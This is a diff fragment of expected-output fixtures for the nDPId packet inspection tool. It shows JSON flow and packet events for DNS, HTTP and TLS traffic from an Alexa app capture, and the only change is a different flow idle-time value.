00542{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1490976031687,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"thread_ts_msec":1490976031687,"pkt":"ePiC0\/vCAMDKkaPvCABFAABl0Y5AAEARu\/+sECoBrBAq2AA1oEYAUS8VStyBgAABAAIAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAcAMAAUAAQAAAA8ACwhwaXRhbmd1acASwC4AAQABAAAADwAENF7ohg=="} 00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":137,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976031581,"flow_last_seen":1490976031687,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976031687,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41030,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":138,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976031691,"flow_last_seen":1490976031691,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976031691,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49572,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1490976031691,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976031691,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8fGdAAEAGyoesECrYNF7ohsGkAFBD6jbWAAAAAKAC\/\/\/L1QAAAgQFtAQCCAoA9kqxAAAAAAEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1490976031773,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976031773,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwMAtAAOcGb+80XuiGrBAq2ABQwaTMUP0xQ+o213ASH\/5qBQAAAgQFtAEDAwY="} 
-00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1490976031774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976031774,"pkt":"AMDKkaPvePiC0\/vCCABFAAAofGhAAEAGypqsECrYNF7ohsGkAFBD6jbXzFD9MlAQAVe0dgAA"} -00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":143,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976031691,"flow_last_seen":1490976031776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":808,"flow_tot_l4_payload_len":808,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1490976031776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49572,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/manifest\/pitangui.appcache","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36"}} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":138,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976031691,"flow_last_seen":1490976031691,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976031691,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49572,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":138,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1490976031691,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976031691,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8fGdAAEAGyoesECrYNF7ohsGkAFBD6jbWAAAAAKAC\/\/\/L1QAAAgQFtAQCCAoA9kqxAAAAAAEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1490976031773,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976031773,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwMAtAAOcGb+80XuiGrBAq2ABQwaTMUP0xQ+o213ASH\/5qBQAAAgQFtAEDAwY="} 
+00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1490976031774,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976031774,"pkt":"AMDKkaPvePiC0\/vCCABFAAAofGhAAEAGypqsECrYNF7ohsGkAFBD6jbXzFD9MlAQAVe0dgAA"} +00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":143,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976031691,"flow_last_seen":1490976031776,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":808,"flow_tot_l4_payload_len":808,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1490976031776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49572,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/manifest\/pitangui.appcache","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36"}} 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":148,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976032763,"flow_last_seen":1490976032763,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1490976032763,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 
00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1490976032763,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"thread_ts_msec":1490976032763,"pkt":"MzMAAAAWePiC0\/vCht1gAAAAACQAAf6AAAAAAAAAeviC\/\/7T+8L\/AgAAAAAAAAAAAAAAAAAWOgAFAgAAAQCPAHvkAAAAAQQAAAD\/AgAAAAAAAAAAAAH\/0\/vC"} 00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":148,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976032763,"flow_last_seen":1490976032763,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1490976032763,"l3_proto":"ip6","src_ip":"fe80::7af8:82ff:fed3:fbc2","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
@@ -124,49 +124,49 @@ 00805{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976035502,"flow_last_seen":1490976035502,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":58,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1490976035502,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":23559,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"cognito-identity.us-east-1.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00650{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1490976035549,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":196,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":196,"pkt_l4_len":162,"thread_ts_msec":1490976035549,"pkt":"ePiC0\/vCAMDKkaPvCABFAAC20jNAAEARuwmsECoBrBAq2AA1XAcAoid0gPuBgAABAAYAAAAAEGNvZ25pdG8taWRlbnRpdHkJdXMtZWFzdC0xCWFtYXpvbmF3cwNjb20AAAEAAcAMAAEAAQAAAAIABCLHNPDADAABAAEAAAACAAQ0AM87wAwAAQABAAAAAgAENBT4ysAMAAEAAQAAAAIABCLAPyvADAABAAEAAAACAAQ0ynf3wAwAAQABAAAAAgAENq23qQ=="} 
00822{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":157,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976035502,"flow_last_seen":1490976035549,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1490976035549,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":23559,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"cognito-identity.us-east-1.amazonaws.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"34.199.52.240"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976035553,"flow_last_seen":1490976035553,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976035553,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1490976035553,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976035553,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8JIdAAEAG55WsECrYIsc08JXbAbv9XGi0AAAAAKAC\/\/\/OjgAAAgQFtAQCCAoA9kwzAAAAAAEDAwg="} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1490976035610,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976035610,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAOsGYRwixzTwrBAq2AG7ldsM0X8G\/VxotaASaN9A1wAAAgQFtAQCCApEF1TYAPZMMwEDAwg="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1490976035612,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976035612,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0JIhAAEAG55ysECrYIsc08JXbAbv9XGi1DNF\/B4AQAVfXJgAAAQEICgD2TDlEF1TY"} -00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976035553,"flow_last_seen":1490976035616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":228,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976035616,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 
-00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":163,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976035553,"flow_last_seen":1490976035733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1676,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1490976035733,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01327{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":165,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976035553,"flow_last_seen":1490976035733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3617,"flow_avg_l4_payload_len":452,"midstream":0,"thread_ts_msec":1490976035733,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","server_names":"cognito-identity.amazonaws.com,cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, 
OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=cognito-identity.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"56:17:8F:E9:45:10:32:78:FF:FD:E3:09:60:5A:B5:3B:8D:8C:F8:34"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":182,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976037754,"flow_last_seen":1490976037754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976037754,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38364,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":182,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1490976037754,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976037754,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8+KpAAEAGE3KsECrYIsc08JXcAbvRHbWkAAAAAKAC\/\/+tAQAAAgQFtAQCCAoA9k0OAAAAAAEDAwg="} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1490976037803,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976037803,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAOoGYhwixzTwrBAq2AG7ldw4CtRs0R21paASaN+cagAAAgQFtAQCCApEF1cYAPZNDgEDAwg="} 
-00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1490976037807,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976037807,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0+KtAAEAGE3msECrYIsc08JXcAbvRHbWlOArUbYAQAVcyugAAAQEICgD2TRREF1cY"} -00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":185,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976037754,"flow_last_seen":1490976037809,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976037809,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38364,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00937{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":187,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976037754,"flow_last_seen":1490976037920,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":405,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1490976037920,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38364,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976035553,"flow_last_seen":1490976035553,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976035553,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1490976035553,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976035553,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8JIdAAEAG55WsECrYIsc08JXbAbv9XGi0AAAAAKAC\/\/\/OjgAAAgQFtAQCCAoA9kwzAAAAAAEDAwg="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1490976035610,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976035610,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAOsGYRwixzTwrBAq2AG7ldsM0X8G\/VxotaASaN9A1wAAAgQFtAQCCApEF1TYAPZMMwEDAwg="} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1490976035612,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976035612,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0JIhAAEAG55ysECrYIsc08JXbAbv9XGi1DNF\/B4AQAVfXJgAAAQEICgD2TDlEF1TY"} +00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976035553,"flow_last_seen":1490976035616,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":228,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976035616,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00940{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":163,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976035553,"flow_last_seen":1490976035733,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1676,"flow_avg_l4_payload_len":279,"midstream":0,"thread_ts_msec":1490976035733,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01327{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":165,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976035553,"flow_last_seen":1490976035733,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3617,"flow_avg_l4_payload_len":452,"midstream":0,"thread_ts_msec":1490976035733,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38363,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cognito-identity.us-east-1.amazonaws.com","server_names":"cognito-identity.amazonaws.com,cognito-identity.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=cognito-identity.us-east-1.amazonaws.com","alpn":"h2,http\/1.1","fingerprint":"56:17:8F:E9:45:10:32:78:FF:FD:E3:09:60:5A:B5:3B:8D:8C:F8:34"}} 
